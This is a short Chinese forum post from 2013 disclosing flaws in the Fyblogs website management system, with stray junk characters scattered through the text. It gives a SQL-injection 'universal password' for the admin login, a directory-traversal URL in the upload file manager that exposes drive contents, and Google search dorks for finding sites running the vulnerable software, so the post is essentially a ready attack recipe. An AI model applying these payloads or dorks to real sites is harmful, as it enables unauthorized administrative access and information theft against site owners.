找回密码
 立即注册
查看: 2934|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'& h4 d) O9 C/ X1 ?& r: e- n5 r

1 C& K2 g" p* C5 C, r, B1 X! [! L后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ ]. @( Z2 i7 F: W
admin/uploadfile.asp?currentFolder=/upfiles/../
' G! W# c1 P) P1 t' M$ i+ q
# T* n' ^$ v1 ^/ R1 t+ p9 {' K# L4 I/ w漏洞证明:; h1 E+ k5 @1 b

0 b& y& j. r: g4 e# G6 G# V谷歌:inurl:type.asp?id=1 新闻中心
+ ?  U  U/ M- W- E$ P1 E/ A' X' ?9 o; a或者 :inurl:download_ok.asp?7 \$ C" i) t% Z1 P

6 A% C: r; E3 ]: I2 n. [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表